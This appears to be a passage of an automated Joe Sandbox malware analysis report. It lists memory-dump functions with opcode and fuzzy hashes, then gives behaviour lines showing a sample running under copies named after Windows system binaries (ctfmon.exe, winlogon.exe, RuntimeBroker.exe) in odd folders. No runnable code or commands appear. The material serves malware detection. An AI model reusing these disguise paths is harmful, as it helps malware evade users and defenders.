Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F134F5 Relevance: .1, Instructions: 55COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000025.00000002.2236633517.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_37_2_7ff848f10000_QeWHGGzCXwoQygZUiDI.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 06d1721b853515602e9b6e504d695a26a1b6b5b6de12c984918aaed9eee0f5a8
Instruction ID: 5940a3f4db1a8e545a2af39af447d2be2396880f813d34b0a6e925b6241b1a26
Opcode Fuzzy Hash: 06d1721b853515602e9b6e504d695a26a1b6b5b6de12c984918aaed9eee0f5a8
Instruction Fuzzy Hash: F3115B7091C68E8FDB99EF6888596BE7BA0FF18701F4404BED41AC61D2EB39A944C704

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F1BCE5 Relevance: .1, Instructions: 54COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000025.00000002.2236633517.00007FF848F1A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F1A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_37_2_7ff848f1a000_QeWHGGzCXwoQygZUiDI.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fb2748246f4c55061263fd77bb061f94e3f468b2cf5ced2cbe34b9234ea5fcb8
Instruction ID: 1cec42e245f5453f90c66a24e5727439eff4f9fce6926011f03908cb3afc8364
Opcode Fuzzy Hash: fb2748246f4c55061263fd77bb061f94e3f468b2cf5ced2cbe34b9234ea5fcb8
Instruction Fuzzy Hash: 64115B3091DA8E8FEB89EF6888592BDBBE0FF28341F4405BED419C61D2DB75A940C704

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F12E61 Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000025.00000002.2236633517.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_37_2_7ff848f10000_QeWHGGzCXwoQygZUiDI.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5447f076b0da0b2d911e968aa227847ff1e2502436406ccf6f406f1ec5532dfa
Instruction ID: 9d3d88dd22e980bbceaad100081034d5dc6a8df7d9f61fba40542d834cbbc756
Opcode Fuzzy Hash: 5447f076b0da0b2d911e968aa227847ff1e2502436406ccf6f406f1ec5532dfa
Instruction Fuzzy Hash: B4017830D0D68E9FE751FBA888486B97BE0FF59341F0508BAE40CC61E2EB38E8548705

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F105D8 Relevance: .0, Instructions: 50COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000025.00000002.2236633517.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_37_2_7ff848f10000_QeWHGGzCXwoQygZUiDI.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9b1dfcdd31271832b388e19802c524d428510c14ff3c0ee6e145b55ae41652e1
Instruction ID: ca5e7f37ceabe63fde143b716d0ac1ed3b8fd6f77376055a29597594a3efdaff
Opcode Fuzzy Hash: 9b1dfcdd31271832b388e19802c524d428510c14ff3c0ee6e145b55ae41652e1
Instruction Fuzzy Hash: 5B015E3090950E8FEB48EF24C4596FA77A1FF68345F50557ED40EC25D2DB36A9A0CB48

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F22275 Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000025.00000002.2236633517.00007FF848F21000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F21000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_37_2_7ff848f21000_QeWHGGzCXwoQygZUiDI.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 00533019519e1c54ac0b400384bc8bbd070d110bb34b8c631552857bb88d4c41
Instruction ID: 248f0220d0ebf71db499229975cf1b0c8f13ece61b0d72e9459178123454ac51
Opcode Fuzzy Hash: 00533019519e1c54ac0b400384bc8bbd070d110bb34b8c631552857bb88d4c41
Instruction Fuzzy Hash: C601D43084D6498FEB49EF74D4686BABBA0FF19300F0108BAD41AC60D2DF36A554CB20

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F27D31 Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000025.00000002.2236633517.00007FF848F27000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F27000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_37_2_7ff848f27000_QeWHGGzCXwoQygZUiDI.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3652373ad62cd58519a300b56d89b115dcf0798d1b21c81d54b66bfac1fc6bb4
Instruction ID: e01601927d6add6e28c816e72df7c1d551d3445980acf707073d5a576a5a79ae
Opcode Fuzzy Hash: 3652373ad62cd58519a300b56d89b115dcf0798d1b21c81d54b66bfac1fc6bb4
Instruction Fuzzy Hash: 26017C3085DA898FDB49EF24D8696BD7BA0FF19340F4405BED40AC61D2DF76A550C741

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F1283D Relevance: .0, Instructions: 47COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000025.00000002.2236633517.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_37_2_7ff848f10000_QeWHGGzCXwoQygZUiDI.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2c7f53c7e129fce007ed01d27b7c59f62b6122ab3c4985d065b27d0db2b865d9
Instruction ID: f6fae19d5117623b675d58098730d39aaac0e9e1bceaf8bf5cf4f0d75fe4d1e9
Opcode Fuzzy Hash: 2c7f53c7e129fce007ed01d27b7c59f62b6122ab3c4985d065b27d0db2b865d9
Instruction Fuzzy Hash: 30018B3085D68E9FE795FBA8888C6B97BE0FF69351F5504B7D408C70A2EB38E8408704

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F27DAD Relevance: .0, Instructions: 46COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000025.00000002.2236633517.00007FF848F27000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F27000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_37_2_7ff848f27000_QeWHGGzCXwoQygZUiDI.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ac77cbc1b2736a0e0ab0b664759d4c16a5e620304aa9e4c6fe952db57776a3eb
Instruction ID: 64ff1dda67fe3f37e30569a1d309ef827cf89810a427584bd21ad072fd7c8ef8
Opcode Fuzzy Hash: ac77cbc1b2736a0e0ab0b664759d4c16a5e620304aa9e4c6fe952db57776a3eb
Instruction Fuzzy Hash: 52019A3090DA8A8FDB4AEB3494692BE7BA0FF19340F8005BAD40AC61D2EF26A440C751

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F12ED9 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000025.00000002.2236633517.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_37_2_7ff848f10000_QeWHGGzCXwoQygZUiDI.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 44f3ff4fda235a42c0ec9691bb4aaa24a6ac60c2932a91422fc7349e8880fb76
Instruction ID: 0b594ceb2db3002fbc9725ae6e9d4178789ac986a00828ac47bb046c51dda18e
Opcode Fuzzy Hash: 44f3ff4fda235a42c0ec9691bb4aaa24a6ac60c2932a91422fc7349e8880fb76
Instruction Fuzzy Hash: 4D017C3191D6898FE742FBB888596A97BE0EF5A340F4604B7D408CB0E6EB38A8448715

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F1AAA9 Relevance: .0, Instructions: 43COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000025.00000002.2236633517.00007FF848F1A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F1A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_37_2_7ff848f1a000_QeWHGGzCXwoQygZUiDI.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 510e074dd587119d5183f64ae483cf779da4f3f5f347298e7e744af98729e925
Instruction ID: 7da7c40768e600d927f821c736239432283221a269a3b0a14a9146b9c6cf9887
Opcode Fuzzy Hash: 510e074dd587119d5183f64ae483cf779da4f3f5f347298e7e744af98729e925
Instruction Fuzzy Hash: 61018F3094D6898FE752FB7489595A97BE0EF19380F050AF7D008C70A2EF38A884C711

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F275C9 Relevance: .0, Instructions: 43COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000025.00000002.2236633517.00007FF848F27000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F27000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_37_2_7ff848f27000_QeWHGGzCXwoQygZUiDI.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 181e088cccf242faf40903bbf734e53cd378620e8d2bfead75eb47232285743e
Instruction ID: a97e095d6a882e40e9bf1bf9a908fde9e1e459e68bef130ddea5d31d1f7e5491
Opcode Fuzzy Hash: 181e088cccf242faf40903bbf734e53cd378620e8d2bfead75eb47232285743e
Instruction Fuzzy Hash: 4B018F7084EA8A5FE742FB38989D1A9BFE0EF1A340F0508F2D408C70E2EF29A4448701

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F10608 Relevance: .0, Instructions: 42COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000025.00000002.2236633517.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_37_2_7ff848f10000_QeWHGGzCXwoQygZUiDI.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 923239b3897f2199c91188e2045e613d6f60ad20f039000555c09881d3365210
Instruction ID: 682ff6b7012abdfdfd6709ff3f09070158d29f461978c7f72ad0fdebcd3d0cae
Opcode Fuzzy Hash: 923239b3897f2199c91188e2045e613d6f60ad20f039000555c09881d3365210
Instruction Fuzzy Hash: 2901693091860E9EEB59FBA484686BE76A1FF18345F50087EE40EC25D1DF35A990C704

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F10610 Relevance: .0, Instructions: 42COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000025.00000002.2236633517.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_37_2_7ff848f10000_QeWHGGzCXwoQygZUiDI.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0a3f9745e7f1b4e10dbe395c7d7ac08dd26b3d7c2bd9422c48a653cdbcf6565f
Instruction ID: 327cf9515e45d5f8b9f6d8ebd9bdcd2efff3287a904d1e3a45c9d03e92884cf9
Opcode Fuzzy Hash: 0a3f9745e7f1b4e10dbe395c7d7ac08dd26b3d7c2bd9422c48a653cdbcf6565f
Instruction Fuzzy Hash: 87016930918A0E9FEB59EBA484592BAB7E0FF18345F20087EE40EC21D1DF3AA950C714

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F11BED Relevance: .0, Instructions: 42COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000025.00000002.2236633517.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_37_2_7ff848f10000_QeWHGGzCXwoQygZUiDI.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 16678c88aa10f7af519639faa92855bdc82526b7ac9fb10ae3803060e6b2fac2
Instruction ID: 958c0b025dbdcda041156ecf90a01a6f9864f4c0ee2a2abe168bb948c4846c22
Opcode Fuzzy Hash: 16678c88aa10f7af519639faa92855bdc82526b7ac9fb10ae3803060e6b2fac2
Instruction Fuzzy Hash: B001813090D68E8FEB59EF2484556FA7BA0FF55341F4415BED808C71D2DB359890C745

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F1BE37 Relevance: .0, Instructions: 39COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000025.00000002.2236633517.00007FF848F1A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F1A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_37_2_7ff848f1a000_QeWHGGzCXwoQygZUiDI.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b560281b64557949bb1898814a498c69014c2f177a1c779df31e33e5358b09d3
Instruction ID: e82182740f22e0cd4f613446e29e145c0e354cf7ed2f36ad6fec5b8541ede28f
Opcode Fuzzy Hash: b560281b64557949bb1898814a498c69014c2f177a1c779df31e33e5358b09d3
Instruction Fuzzy Hash: 3401C874D0960ACFDB18EF85D4906EDBBB1EF48360F24012ED506A32D0CB386D51CB98

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F105D0 Relevance: .0, Instructions: 39COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000025.00000002.2236633517.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_37_2_7ff848f10000_QeWHGGzCXwoQygZUiDI.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a7d6c8f0daf6acecaa09ca312842dc0761896322433a015cdc91b33817cb9617
Instruction ID: 093b1ee28fad4b29ff5adb7709d561357369047c678d5e76b4642e31d7c9e1bf
Opcode Fuzzy Hash: a7d6c8f0daf6acecaa09ca312842dc0761896322433a015cdc91b33817cb9617
Instruction Fuzzy Hash: 11F0F63080E64E8FEB44FF2494052FA77A4FF15349F10153AE80DC21C2DB35A8A0CB48

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F12759 Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000025.00000002.2236633517.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_37_2_7ff848f10000_QeWHGGzCXwoQygZUiDI.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8ccfdc38e86a8c69656d9156a2cde795f96c98e9bf8838ade855f022e6991632
Instruction ID: ac7502fbe776da0007cc97f7db01d8f13143fc5331a398108f0596fb85e36a07
Opcode Fuzzy Hash: 8ccfdc38e86a8c69656d9156a2cde795f96c98e9bf8838ade855f022e6991632
Instruction Fuzzy Hash: 3DF0963180E78A8FEB5AEFB488692BA7F61FF16301F4505FAD409C65D2DB38A854C741

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F27AB3 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000025.00000002.2236633517.00007FF848F27000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F27000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_37_2_7ff848f27000_QeWHGGzCXwoQygZUiDI.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 403a48bc05719d00a18646b6bc4ee239f4a77333e535c17edee65c2259fca143
Instruction ID: 1c29fe4f89e78f8a97c5bfa2092239291d4decb4e321810051eb394afb677750
Opcode Fuzzy Hash: 403a48bc05719d00a18646b6bc4ee239f4a77333e535c17edee65c2259fca143
Instruction Fuzzy Hash: D6F03A35E0851D8BDB58EB98E8914FDB7B6FF98350F50013AD009A3286CF296A068F60

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F127CD Relevance: .0, Instructions: 31COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000025.00000002.2236633517.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_37_2_7ff848f10000_QeWHGGzCXwoQygZUiDI.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c66dd18f47e5df79b7a504e0c20a166743a71338a448bc03fb9264f575590e02
Instruction ID: c2a802ca4a76c8bb079f596f28f7caad315acf58caab4118b8df43fb7541799a
Opcode Fuzzy Hash: c66dd18f47e5df79b7a504e0c20a166743a71338a448bc03fb9264f575590e02
Instruction Fuzzy Hash: 7CF0BE3080E78E8FEB59EFA488192B97BA0FF15351F4405BFE809C60D2EB399854C745

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F11710 Relevance: .0, Instructions: 25COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000025.00000002.2236633517.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_37_2_7ff848f10000_QeWHGGzCXwoQygZUiDI.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3edcd640d88b40015f0de0df0a0e549db975d9348add14aa2e4d1e4220305169
Instruction ID: 693f32c6156efbbeb888949efe4ae0d6f2166c4b5e3abdedecbf942bfa188b7c
Opcode Fuzzy Hash: 3edcd640d88b40015f0de0df0a0e549db975d9348add14aa2e4d1e4220305169
Instruction Fuzzy Hash: BDE0ED30E2D9064EEA647318948567461D59F44394FB89675F01CCA1E7EB2DECC6D209

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F151AE Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000025.00000002.2236633517.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_37_2_7ff848f10000_QeWHGGzCXwoQygZUiDI.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3266d8a40465b9dfa420b565482d1afff400db45b785ab8e3b603c6d57e198d7
Instruction ID: 7b90d23f94693b1f56b7d88455286942ddf29a1b27883871e7f1333bb1267cad
Opcode Fuzzy Hash: 3266d8a40465b9dfa420b565482d1afff400db45b785ab8e3b603c6d57e198d7
Instruction Fuzzy Hash: CCE09670D59E1D8EEBB5EB588C54BB9B6B1BB58742F5010EAC00DE2291DE346E809F04

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F1B32B Relevance: .0, Instructions: 14COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000025.00000002.2236633517.00007FF848F1A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F1A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_37_2_7ff848f1a000_QeWHGGzCXwoQygZUiDI.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7e4a405752e1b4036dad8ab3b0483ba27e633190ddeb2fe1c345b3e17b1431e2
Instruction ID: a8faaab668e84c048920598a78afcce8cca84767f0631327bd4e039fdcf1fb80
Opcode Fuzzy Hash: 7e4a405752e1b4036dad8ab3b0483ba27e633190ddeb2fe1c345b3e17b1431e2
Instruction Fuzzy Hash: 2ED05E30C1D54A9EDB91F710C851AEAB770EF25340F1442E2800DD2186CF38AEC08F44

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F10FA5 Relevance: .0, Instructions: 14COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000025.00000002.2236633517.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_37_2_7ff848f10000_QeWHGGzCXwoQygZUiDI.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f905bfb0678a419b5bcee6be4cb19129081b164d2a0def44a17f05fdaeb88c36
Instruction ID: 7842b81a213a55d1f427058d15cb8473fcdf055c5e34652ad3ec9e905fc3d47a
Opcode Fuzzy Hash: f905bfb0678a419b5bcee6be4cb19129081b164d2a0def44a17f05fdaeb88c36
Instruction Fuzzy Hash: 57E0EC30D1A5298EE750FB14C810BAEAAB1FF44344F5001B5D00DA32C2CF386D408F58

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F18EA7 Relevance: .0, Instructions: 11COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000025.00000002.2236633517.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_37_2_7ff848f10000_QeWHGGzCXwoQygZUiDI.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 487edb672a762525586fd55eb3a7895dc7cc08b8751fd058bf0e3449a35b2169
Instruction ID: 4c369548c7cb7c212b746bae8d309d2ecf7a1807388be650cc210e98c9e3d292
Opcode Fuzzy Hash: 487edb672a762525586fd55eb3a7895dc7cc08b8751fd058bf0e3449a35b2169
Instruction Fuzzy Hash: C7D06C70A09A298EEBA4EB0488547AAB271FB48342F1005EB840DE72D1EE742E808F04

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00007FF848F21001 Relevance: 7.6, Strings: 6, Instructions: 131COMMON

Download Yara Rule

Strings

{, xrefs: 00007FF848F21001
", xrefs: 00007FF848F21A67
/, xrefs: 00007FF848F21870
[, xrefs: 00007FF848F212E4
&, xrefs: 00007FF848F21A12
", xrefs: 00007FF848F2129E

Memory Dump Source

Source File: 00000025.00000002.2236633517.00007FF848F21000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F21000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_37_2_7ff848f21000_QeWHGGzCXwoQygZUiDI.jbxd

Similarity

API ID:
String ID: "$"$&$/$[${
API String ID: 0-683516320
Opcode ID: 76e8b2553306c7a762bf02d96e58d16827ac713ada0203a758630aacac3eafb9
Instruction ID: e604c0cffb783123f601c6e7a70d69cb7de0aefc66999626faa34f681db9c656
Opcode Fuzzy Hash: 76e8b2553306c7a762bf02d96e58d16827ac713ada0203a758630aacac3eafb9
Instruction Fuzzy Hash: E651C470D082298EEB68EF95D4947FDB6B1BF58341F1040BAD05EA72C1CB396984DF19

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F2199B Relevance: 5.1, Strings: 4, Instructions: 76COMMON

Download Yara Rule

Strings

}, xrefs: 00007FF848F219DF
", xrefs: 00007FF848F21A67
/, xrefs: 00007FF848F21870
&, xrefs: 00007FF848F21A12

Memory Dump Source

Source File: 00000025.00000002.2236633517.00007FF848F21000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F21000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_37_2_7ff848f21000_QeWHGGzCXwoQygZUiDI.jbxd

Similarity

API ID:
String ID: "$&$/$}
API String ID: 0-3572482012
Opcode ID: c0b9440c54c56e73e76cde5c4196e37fb96f94aa2c2bcbc44ecf7b88862913c3
Instruction ID: 212fd6290dc5d1c6ed47dd41f2efd8d49d786c0ddedd04da56bae1675695e2c7
Opcode Fuzzy Hash: c0b9440c54c56e73e76cde5c4196e37fb96f94aa2c2bcbc44ecf7b88862913c3
Instruction Fuzzy Hash: A931E074D082298FDBA8EF94D8907FDB7B1FB54341F1045AAD04AAB2D0DB386A84CF44

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: ctfmon.exePID: 8060, Parent PID: 1028COMMON

Executed Functions

Function 00007FF848F1D8D8 Relevance: .5, Instructions: 497COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000027.00000002.2300331745.00007FF848F1D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F1D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_39_2_7ff848f1d000_ctfmon.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 192e590a588c115c138b4c45a88be196161e3e4966b5b1e40431c0f167e67f98
Instruction ID: 5b1216dfa5ef5e7462fe5f0be26458da0a1e0ae784efb98e3c3047d6d01cdcd1
Opcode Fuzzy Hash: 192e590a588c115c138b4c45a88be196161e3e4966b5b1e40431c0f167e67f98
Instruction Fuzzy Hash: 2D024931D19A5A8FEB98EB68C4A57B9B7B1FF59341F4401BAD00ED72D2CB386844CB44

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F1AB15 Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000027.00000002.2300331745.00007FF848F1A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F1A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_39_2_7ff848f1a000_ctfmon.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 686960d96d5d99dcf91faaaaae729d68605468138476b728393d0cc3557712f4
Instruction ID: 2392103251e56cfb6c7293d317d51f8c8436caa0a08ad0a0a661f641b014441e
Opcode Fuzzy Hash: 686960d96d5d99dcf91faaaaae729d68605468138476b728393d0cc3557712f4
Instruction Fuzzy Hash: AA11D635A0D3564FD302EB6CE8A56D97BB0EF55361B0942F7C144CB093DA28A4498794

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F1AAA9 Relevance: .0, Instructions: 43COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000027.00000002.2300331745.00007FF848F1A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F1A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_39_2_7ff848f1a000_ctfmon.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 510e074dd587119d5183f64ae483cf779da4f3f5f347298e7e744af98729e925
Instruction ID: 7da7c40768e600d927f821c736239432283221a269a3b0a14a9146b9c6cf9887
Opcode Fuzzy Hash: 510e074dd587119d5183f64ae483cf779da4f3f5f347298e7e744af98729e925
Instruction Fuzzy Hash: 61018F3094D6898FE752FB7489595A97BE0EF19380F050AF7D008C70A2EF38A884C711

Uniqueness

Uniqueness Score: -1.00%

Source: C:\Users\user\Desktop\B9exXW7c3t.exe	Queries volume information: C:\Users\user\Desktop\B9exXW7c3t.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\B9exXW7c3t.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\B9exXW7c3t.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SchCache\QeWHGGzCXwoQygZUiDI.exe	Queries volume information: C:\Windows\SchCache\QeWHGGzCXwoQygZUiDI.exe VolumeInformation	Jump to behavior
Source: C:\Windows\SchCache\QeWHGGzCXwoQygZUiDI.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SchCache\QeWHGGzCXwoQygZUiDI.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation	Jump to behavior
Source: C:\Users\Default\Links\ApplicationFrameHost.exe	Queries volume information: C:\Users\Default\Links\ApplicationFrameHost.exe VolumeInformation	Jump to behavior
Source: C:\Users\Default\Links\ApplicationFrameHost.exe	Queries volume information: C:\Users\Default\Links\ApplicationFrameHost.exe VolumeInformation	Jump to behavior
Source: C:\Users\Default\Links\ApplicationFrameHost.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Users\Default\Links\ApplicationFrameHost.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation	Jump to behavior
Source: C:\Program Files\Windows Mail\ctfmon.exe	Queries volume information: C:\Program Files\Windows Mail\ctfmon.exe VolumeInformation
Source: C:\Program Files\Windows Mail\ctfmon.exe	Queries volume information: C:\Program Files\Windows Mail\ctfmon.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\QeWHGGzCXwoQygZUiDI.exe	Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\QeWHGGzCXwoQygZUiDI.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\QeWHGGzCXwoQygZUiDI.exe	Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\QeWHGGzCXwoQygZUiDI.exe VolumeInformation
Source: C:\Users\Public\AccountPictures\RuntimeBroker.exe	Queries volume information: C:\Users\Public\AccountPictures\RuntimeBroker.exe VolumeInformation
Source: C:\Users\Public\AccountPictures\RuntimeBroker.exe	Queries volume information: C:\Users\Public\AccountPictures\RuntimeBroker.exe VolumeInformation
Source: C:\Program Files\Common Files\System\msadc\en-US\winlogon.exe	Queries volume information: C:\Program Files\Common Files\System\msadc\en-US\winlogon.exe VolumeInformation
